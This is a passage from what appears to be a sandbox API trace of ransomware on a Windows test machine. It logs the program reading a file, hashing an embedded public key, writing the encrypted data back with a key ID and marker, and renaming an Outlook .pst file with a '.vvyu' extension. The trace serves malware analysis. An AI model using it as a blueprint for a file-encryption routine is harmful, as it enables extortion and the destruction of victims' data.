dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0196.749] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x423da, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0196.749] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0196.750] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0196.750] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x25805, lpOverlapped=0x0) returned 1 [0196.754] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.754] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2e912b0 [0196.754] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.754] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.755] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0196.756] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0196.756] CryptHashData (hHash=0x2cfe140, pbData=0x2e912b0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0196.756] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0196.756] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0196.756] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0196.756] GetLastError () returned 0x0 [0196.756] CryptDestroyHash (hHash=0x2cfe140) returned 1 [0196.756] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0196.757] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0196.757] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0196.757] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0196.757] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0196.757] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0196.757] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0196.757] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0196.757] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25810) returned 0x2ea79b0 [0196.758] SetFilePointer (in: hFile=0x568, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0196.759] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0196.759] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0196.759] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0196.759] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2e912b0 [0196.759] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0196.759] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea19b0 [0196.759] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2ed0 [0196.759] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea19f8 [0196.759] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2ee8 [0196.759] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2f18 [0196.759] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2f78 [0196.759] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2f30 [0196.759] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0196.759] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0196.759] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aca8 [0196.759] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea6a68 [0196.759] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2f18 | out: hHeap=0x620000) returned 1 [0196.759] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2f30 | out: hHeap=0x620000) returned 1 [0196.759] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2f78 | out: hHeap=0x620000) returned 1 [0196.760] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0196.760] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0196.760] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2f78 [0196.760] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a50 [0196.760] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2f30 [0196.760] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0196.760] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea2f18 [0196.760] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a70 [0196.760] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c998c8 [0196.760] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83b60 [0196.761] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0196.761] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0196.761] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99c10 [0196.761] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85da8 [0196.761] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0196.761] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0196.761] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2f30 | out: hHeap=0x620000) returned 1 [0196.761] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0196.761] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2f18 | out: hHeap=0x620000) returned 1 [0196.761] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0196.761] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0196.761] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2f78 | out: hHeap=0x620000) returned 1 [0196.762] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83b60 | out: hHeap=0x620000) returned 1 [0196.762] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0196.762] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aca8 | out: hHeap=0x620000) returned 1 [0196.762] GetCurrentThreadId () returned 0x66c [0196.762] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0196.762] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea56e0 [0196.762] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd95d8 [0196.762] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0196.763] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0196.763] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0196.763] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0196.763] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0196.763] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0196.763] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0196.763] GetCurrentThreadId () returned 0x66c [0196.763] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0196.763] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0196.763] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2e914a8 [0196.764] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0196.764] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0196.764] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0196.764] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0196.765] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0196.765] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0196.765] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0196.765] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaf50 [0196.765] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0196.765] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0196.765] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0196.765] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2f78 [0196.765] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0196.765] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0196.765] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0196.765] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0196.765] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0196.765] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0196.765] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0196.765] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0196.765] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2f18 [0196.765] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0196.765] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ab0 [0196.765] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0196.766] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0196.766] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b10 [0196.766] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0196.766] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0196.766] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2f30 [0196.766] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0196.766] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0196.766] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b10 | out: hHeap=0x620000) returned 1 [0196.766] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2f00 [0196.766] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0196.766] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2f90 [0196.766] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0196.766] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ad0 [0196.766] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0196.766] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2f60 [0196.766] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0196.766] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2f48 [0196.766] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0196.766] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2fa8 [0196.766] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2f48 | out: hHeap=0x620000) returned 1 [0196.766] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2f48 [0196.766] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2f60 | out: hHeap=0x620000) returned 1 [0196.766] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0196.766] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0196.767] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0196.767] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0196.767] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83b60 [0196.767] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2f18 | out: hHeap=0x620000) returned 1 [0196.767] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2f18 [0196.767] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0196.767] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2d08630 [0196.767] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2f78 | out: hHeap=0x620000) returned 1 [0196.767] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c998c8 [0196.767] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2fa8 | out: hHeap=0x620000) returned 1 [0196.767] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea6a68 [0196.767] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83b60 | out: hHeap=0x620000) returned 1 [0196.767] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99af8 [0196.767] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0196.767] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99d28 [0196.767] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2f18 | out: hHeap=0x620000) returned 1 [0196.767] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea6c80 [0196.768] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0196.768] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0196.768] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0196.768] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0196.769] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0196.769] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0196.769] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0196.769] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0196.770] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0196.770] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6c80 | out: hHeap=0x620000) returned 1 [0196.770] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0196.770] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0196.770] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2f48 | out: hHeap=0x620000) returned 1 [0196.770] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0196.770] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2f90 | out: hHeap=0x620000) returned 1 [0196.770] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0196.770] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2f30 | out: hHeap=0x620000) returned 1 [0196.770] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2f00 | out: hHeap=0x620000) returned 1 [0196.771] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0196.771] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0196.771] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0196.771] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ee8 | out: hHeap=0x620000) returned 1 [0196.772] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea19f8 | out: hHeap=0x620000) returned 1 [0196.772] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0196.772] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0196.773] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaf50 | out: hHeap=0x620000) returned 1 [0196.773] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0196.773] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0196.773] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0196.773] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0196.774] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0196.774] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0196.774] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0196.774] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0196.775] WriteFile (in: hFile=0x568, lpBuffer=0x2ea79b0*, nNumberOfBytesToWrite=0x25800, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea79b0*, lpNumberOfBytesWritten=0x312fb14*=0x25800, lpOverlapped=0x0) returned 1 [0196.777] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea79b0 | out: hHeap=0x620000) returned 1 [0196.777] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x42400, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0196.777] WriteFile (in: hFile=0x568, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0196.952] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0196.952] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0196.952] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea6a68 [0196.952] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea6a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0196.952] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea6e98 [0196.952] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0196.952] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0196.953] WriteFile (in: hFile=0x568, lpBuffer=0x2ea6e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea6e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0196.953] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6e98 | out: hHeap=0x620000) returned 1 [0196.953] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0196.953] WriteFile (in: hFile=0x568, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0196.953] CloseHandle (hObject=0x568) returned 1 [0196.958] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0196.958] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x890) returned 0x2ea6a68 [0196.958] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0196.959] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\Outlook Files\\franc@gdllo.de.pst" (normalized: "c:\\users\\keecfmwgj\\documents\\outlook files\\franc@gdllo.de.pst"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\Outlook Files\\franc@gdllo.de.pst.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\outlook files\\franc@gdllo.de.pst.vvyu")) returned 1 [0196.961] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0196.961] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0196.962] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0196.964] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0196.964] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4d7697b0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x4d7697b0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x3aa38830, 